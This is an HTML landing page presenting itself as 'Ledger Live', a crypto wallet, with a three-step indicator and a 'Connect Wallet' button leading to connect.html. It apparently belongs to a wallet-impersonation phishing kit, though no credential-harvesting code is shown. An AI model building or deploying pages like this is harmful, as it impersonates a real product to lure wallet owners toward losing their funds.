<html lang="en"><head><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1"
><title>Ledger Live</title>
    <link rel="icon" type="image/x-icon" href="./logo.png">
<link href="standalone.5308b6b6.css" rel="preload" as="style">
<link href="standalone.5308b6b6.css" rel="stylesheet">

</head><body><div class="wrap"><div data-v-a92dbbbe="" class="sign mui-fl-central">
<header data-v-a92dbbbe="" class="s-header mui-fl-vert mui-fl-btw">
</header><div data-v-a92dbbbe="" class="signbox"><div data-v-a92dbbbe="" class="sb-header">
<button data-v-a92dbbbe="" class="back-btn taplight2" style="display: none;"></button>
<ul data-v-a92dbbbe="" class="step mui-fl-central"><li data-v-a92dbbbe="" class="active"></li>
<li data-v-a92dbbbe="" class=""></li>
<li data-v-a92dbbbe="" class=""></li></ul></div><div data-v-a92dbbbe="" class="sb-body">
<i data-v-a92dbbbe="" class="sb-logo"></i><h2 data-v-a92dbbbe="" class="t1">Ledger Live</h2>
<p data-v-a92dbbbe="" class="t2">Best Crypto Wallet<br data-v-a92dbbbe="">for Desktop & Mobile</p>
<button class="fz18 van-button van-button--info van-button--normal van-button--block" 
    onclick="window.location.href = 'connect.html';">
        Connect Wallet
    </button>
</div>
</div>
</div>
